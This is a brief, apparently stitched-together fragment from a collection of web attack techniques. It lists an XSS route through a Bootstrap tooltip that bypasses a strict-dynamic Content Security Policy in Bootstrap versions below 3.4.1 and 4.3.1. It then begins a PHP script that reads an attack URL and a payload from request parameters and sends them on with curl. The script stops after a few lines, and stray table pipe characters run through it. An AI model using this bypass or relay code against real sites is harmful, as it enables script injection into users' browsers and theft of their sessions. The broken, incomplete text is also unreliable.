Bootstrap < 3.4.1 || < 4.3.1
✔️ CSP strict-dynamic bypass
➖ Requires user interaction
➖ Requires $('[data-toggle="tooltip"]').tooltip();
<?php | |
$attack_url = $_GET['url']; | |
$payload = $_GET['payload']; | |
$ch = curl_init(); | |
if(isset($_SERVER['HTTP_ACCEPT'])) { | |
$headers[] = 'Accept: '.$_SERVER['HTTP_ACCEPT']; | |
} |